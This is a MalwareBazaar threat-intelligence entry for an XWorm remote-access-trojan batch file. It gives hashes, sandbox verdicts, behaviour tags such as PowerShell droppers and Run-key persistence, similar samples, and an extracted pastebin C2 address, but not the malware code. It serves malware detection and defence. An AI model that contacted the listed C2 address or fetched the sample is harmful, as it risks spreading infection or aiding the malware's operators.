MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


XWorm


Vendor detections: 13


Intelligence 13 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d
SHA3-384 hash: cc1681b92217107df96ce440f59ef5873ea3b94eecb69e486ff198106fc836828359dd80cb7ba2018a94b6e50bec0b7f
SHA1 hash: a175c6ca4d3ff8ccc72ccca1889c6e3917ced7ca
MD5 hash: 37b99fc7edecf05abc6f84f3b5cbd17d
humanhash: july-queen-vermont-double
File name:ghost_crypter.bat
Download: download sample
Signature XWorm
Create hunting rule
File size:307 bytes
First seen:2025-12-25 21:23:44 UTC
Last seen:Never
File type:Batch (bat) bat
MIME type:text/x-msdos-batch
ssdeep 6:hHNGDXvay2olNHn+YWjvT9Ds81R3KupMFXA98WFW0LW62EIJR3Kb6:myyrXn+YWjvT9Y81kUMhA98WFWyW6mk+
Threatray 1'223 similar samples on MalwareBazaar
TLSH T194E0EB849C28705FEEDFC598872203066C4722C2960F83411B2CF8313A02EEEC7DE8A3
Magika batch
Reporter BastianHein
Tags:bat xworm

Intelligence

File Origin
# of uploads :
1
# of downloads :
67
Origin country :
CL CL
Vendor Threat Intelligence
No detections
Malware family:
n/a
ID:
1
File name:
ghost_crypter.bat
Verdict:
Malicious activity
Analysis date:
2025-12-25 21:24:21 UTC
Tags:
xworm pastebin auto-startup auto-reg remote
Link:
https://app.any.run/tasks/30982d71-eef7-46e5-8768-d94221d86893

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/46110/
Verdict:
Malicious
Score:
92.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=694dab8101c7b4a8fe55d84f
Tags:
asyncrat shell agent sage
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
base64 dropper evasive lolbin mshta powershell powershell svchost.exe
Link:
https://www.filescan.io/uploads/694dab7e84afa5547b5e0a9f/reports/4738233b-5555-41e0-b749-59853f8f5c9f/overview
Verdict:
Suspicious
Labled as:
TR/SNH
Link:
https://www.hybrid-analysis.com/sample/b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d
Verdict:
Malicious
File Type:
unix shell
First seen:
2025-12-25T17:21:00Z UTC
Last seen:
2025-12-27T17:31:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan.BAT.Agent.gen Trojan.Win32.Runner.b Trojan.Win32.Agent.sb
Link:
https://opentip.kaspersky.com/b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d/results?tab=lookup
Score:
49%
Verdict:
Susipicious
File Type:
SCRIPT
Link:
https://malprob.io/report/b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d/
Verdict:
Malicious
Threat:
Family.XWORM
Link:
https://tip.neiki.dev/file/b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d
Threat name:
Win32.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2025-12-25 21:24:17 UTC
File Type:
Text (Batch)
AV detection:
2 of 24 (8.33%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=wdbf7lp3s4t2ndq6pkxjlrmkfcrs5b5mtllcki2wzjxhsqgccewq._file
Verdict:
malicious
Label(s):
xworm
Create hunting rule
Similar samples:
43c8dfe3daa3b5402f2c673b1bae02dc73f653570033efcd63e19a9b0f3e0255
XWorm
62285c6053cf93283241a86e9202fe9a1fc4a06dc996c7da7234bd01d40b9006
XWorm
84bc64c5f0b3e217896ebecb8b6d434d0c8fb4c33aa87125b3b8e2062aa283d5
XWorm
90fdc91facdcf314acf7bd6ed6575646ce3e11e47c049f5e89190e803bce13f6
XWorm
a889d4486a90d6964b86ee97751fa0c10607fcff8823fd31d968a32edece72cf
XWorm
b21fbdd64dc782bc10c3f565712a447d275ad6fab4126ec2cec8b4ae2b4da314
XWorm
ba5429b33b9afcf4c0d66648b76944affa32c1820fc4edcd096b69ae24ae4e70
XWorm
d273654fd2f6a8bbee67616dc6062189660939471c8e1776d20963386db1de51
XWorm
e0d40091b7f7904d8801fd6d1a67164e02d148035824948bc4a5e255e6fb4876
XWorm
error
XWorm
+ 1'213 additional samples on MalwareBazaar
Result
Malware family:
xworm
Create hunting rule
Score:
  10/10
Tags:
family:xworm execution persistence rat trojan
Link:
https://tria.ge/reports/251225-z85xaafk9y/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Drops startup file
Executes dropped EXE
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Detect Xworm Payload
Xworm
Xworm family
Malware Config
C2 Extraction:
https://pastebin.com/raw/BnfuTUHU:7193
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/b0c25fadfb9727a68e1e7aae95c58a28a32e87ac9ad6252356ca6e7940c2112d

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/46110/

Comments